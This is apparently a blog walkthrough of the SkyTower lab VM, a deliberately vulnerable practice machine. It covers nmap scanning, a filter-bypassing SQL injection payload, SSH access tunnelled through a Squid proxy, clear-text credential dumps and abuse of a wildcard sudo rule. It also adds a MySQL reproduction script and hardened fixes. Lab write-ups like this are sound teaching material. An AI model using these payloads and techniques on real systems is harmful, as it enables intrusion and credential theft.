VulnHub target machine: SkyTower

Download: https://www.vulnhub.com/entry/skytower-1,96/
After downloading the VM, open it in VirtualBox and set its network adapter to bridged mode.
Task: escalate privileges and read the flag.

Environment: the attacker and the target are both on the 192.168.8.0/24 segment.
Attacker: Kali Linux, 192.168.8.108


1. Information collection

To attack the target we first need its IP address, so start with an nmap host discovery (ping) sweep of the segment.
Command: nmap -sP 192.168.8.0/24
(-sP is the old spelling of -sn, the no-port-scan host discovery mode; current nmap accepts both.)


With the target identified as 192.168.8.109, run a full-range service scan against it.
Command: nmap -A -p- 192.168.8.109
The scan shows ports 22, 80 and 3128. Port 22 reports as filtered (a firewall drops our packets rather than the service refusing them), and 3128 is an HTTP proxy (the default Squid port). The working guess is that SSH is only reachable from the inside, so we will need to go through the proxy to reach port 22.

Start with port 80.
It presents a login form, so the first thing to try is SQL injection: capture the login request in Burp Suite and send it to Repeater.
Logging in as admin/admin fails, as expected. Now append a single quote to the username (the first admin).
The response is a MySQL syntax error that shows the extra quote, so the username is spliced into the query unescaped. Next append a comment: admin' # gives a plain "login failed" with no SQL error, which confirms the injection point. Now try the classic universal-password payload (admin' or 1=1#).
The error message quotes 1=1# and what follows it, so something was removed from the payload before the query ran. Try the column-count brute force with order by to see what happens to that keyword.
The error now quotes der by and what follows: the or inside order was cut out. Together the two errors say that the filter deletes the substring or. MySQL also accepts || as logical OR, so replace or with || and send the universal payload again.

This time the login succeeds, and the page shows the account john with password hereisjohn.
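The injection sequence above, reconstructed as an added example that is not the page's own code and not the real login.php (whose source the page never shows): a MySQL script against a constructed stand-in table. The table name `login`, the column names, the concatenation pattern, the assumption that the filter simply deletes the substring `or`, and the two placeholder rows are assumptions; john's row and the payloads come from the write-up.

```sql
-- Constructed stand-in for the SkyTech login table. Only john's row comes from the
-- write-up; the two other rows are placeholders, not the real accounts.
CREATE DATABASE IF NOT EXISTS SkyTech;
USE SkyTech;
DROP TABLE IF EXISTS login;
CREATE TABLE login (
  id       INT AUTO_INCREMENT PRIMARY KEY,
  username VARCHAR(64) NOT NULL,
  password VARCHAR(64) NOT NULL   -- stored in clear text, as on the box
);
INSERT INTO login (username, password) VALUES
  ('john',  'hereisjohn'),
  ('user2', 'placeholder-2'),
  ('user3', 'placeholder-3');

-- Assumed shape of what login.php sends (the page does not reproduce the PHP):
--   SELECT * FROM login WHERE username='<user>' AND password='<pass>'
-- with a blacklist that deletes the substring "or" from the input first.
-- Each @q below is that text after the filter. PREPARE/EXECUTE hands it to the
-- server as one opaque string, exactly as mysql_query() would; it is used here
-- only so the mysql client does not trip over the unbalanced quotes itself.
-- Run with `mysql --force` so the script keeps going past the probes that error.

-- Probe 1, username admin' : the extra quote unbalances the literal.
SET @q = "SELECT * FROM login WHERE username='admin'' AND password='admin'";
PREPARE p FROM @q;                 -- ERROR 1064 (42000): syntax error

-- Probe 2, username admin'# : the comment swallows the password check.
-- No error, no rows: the plain "login failed" that proves the injection point.
SET @q = "SELECT * FROM login WHERE username='admin'# ' AND password='admin'";
PREPARE p FROM @q; EXECUTE p;      -- Empty set

-- Probe 3, admin' or 1=1# : the filter strips "or", leaving a bare 1=1.
SET @q = "SELECT * FROM login WHERE username='admin' 1=1# ' AND password='admin'";
PREPARE p FROM @q;                 -- ERROR 1064: ... near '1=1# ...'

-- Probe 4, admin' order by 1# : "order" loses its "or" and becomes "der".
SET @q = "SELECT * FROM login WHERE username='admin' der by 1# ' AND password='admin'";
PREPARE p FROM @q;                 -- ERROR 1064: ... near 'der by 1# ...'

-- Bypass: with the default sql_mode (no PIPES_AS_CONCAT) MySQL reads || as
-- logical OR, and = binds tighter than ||, so this is
-- (username='admin') OR (1=1): every row matches and the app takes the first, john.
SET @q = "SELECT * FROM login WHERE username='admin' || 1=1# ' AND password='admin'";
PREPARE p FROM @q; EXECUTE p;      -- 3 rows, john first
DEALLOCATE PREPARE p;

-- Fix: bind the inputs with placeholders instead of splicing them into the
-- statement text. The same payload is now an ordinary username that matches
-- nothing, and no keyword blacklist is needed at all.
PREPARE login_check FROM
  'SELECT id, username FROM login WHERE username = ? AND password = ?';
SET @user = "admin' || 1=1#";
SET @pass = 'admin';
EXECUTE login_check USING @user, @pass;   -- Empty set
DEALLOCATE PREPARE login_check;
```

Two caveats follow from the script. The `||` trick depends on the server's sql_mode: with PIPES_AS_CONCAT enabled, `||` is string concatenation and this particular bypass fails, which is why a keyword blacklist is still the wrong defence. And the reason john's password appears on the page at all is that the table stores passwords in clear text; the bound-parameter query fixes the injection, but the passwords should also be hashed so that a later read of the table does not hand out logins.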
As guessed above, port 22 has to be reached through the proxy on 3128. proxytunnel is used to build the tunnel: it is pointed at the target's proxy (192.168.8.109:3128), told to connect through it to 127.0.0.1:22 (localhost from the target's point of view, which is why the filtered port becomes reachable), and set to listen locally on port 8888.
Then ssh to port 22 of the target through the local tunnel endpoint (127.0.0.1:8888) as john.
Authentication succeeds, but the session prints "Funds have been withdrawn" and is closed immediately. Since the credentials are good, pass a command on the ssh command line instead of requesting an interactive shell.
Listing the home directory this way works.
Look at .bashrc.
It is the .bashrc that prints the message and exits, killing every interactive login. Delete the file (again via a one-shot ssh command) and log in normally. Note that this alters the target; on a real engagement prefer something reversible, such as renaming the file.
The interactive login now works. Run sudo -l to see whether john has any sudo rights to abuse.
He has none, so move on to the web root, /var/www, and look at login.php.
login.php is the page with the SQL injection, and a PHP login script has to carry the database credentials, so read it.
It connects as the MySQL root user with password root to the database SkyTech. Log into mysql with those credentials and look at the user table.
That gives the passwords of all three users in clear text. Try the second user, sara, next.
Her ssh login hits the same "Funds have been withdrawn" .bashrc trick; repeat the steps above to get a shell as sara.
Check sudo -l.
sara may run cat and ls as root on files under /accounts, granted through a wildcard on the argument. That wording matters: in sudoers, a wildcard in the argument position also matches slashes, so the rule is not really confined to /accounts.

2. Privilege escalation

Find the accounts directory and list it with sudo ls.
Finally, use sudo cat on flag.txt; it contains the root password, theskytower.
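What that sudo -l line permits, and how the same access would be written safely, as an added illustration rather than the box's actual /etc/sudoers (which the page never prints): the first rule is reconstructed from the description above, the second uses made-up file names.

```text
# Reconstructed weak rule (the argument wildcard is the problem):
sara    ALL=(root) NOPASSWD: /bin/cat /accounts/*, /bin/ls /accounts/*
# In sudoers, '*' in a command-line argument matches '/' as well, so any
# path that merely starts with /accounts/ is accepted, including ones that
# use .. to climb back out of that directory.

# Hardened: no wildcard, only the exact invocations sara needs (file names assumed).
sara    ALL=(root) NOPASSWD: /bin/ls /accounts, /bin/cat /accounts/ledger.txt
```

Validate the edited file with visudo -c and confirm with sudo -l as sara that only the listed invocations are accepted. If sara needs to read a changing set of files, a group with read access to /accounts and no sudo rule at all is safer than any wildcard.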
With the root password in hand, the privilege escalation is complete and the box is done.


Source: blog.csdn.net/Slow_/article/details/114132416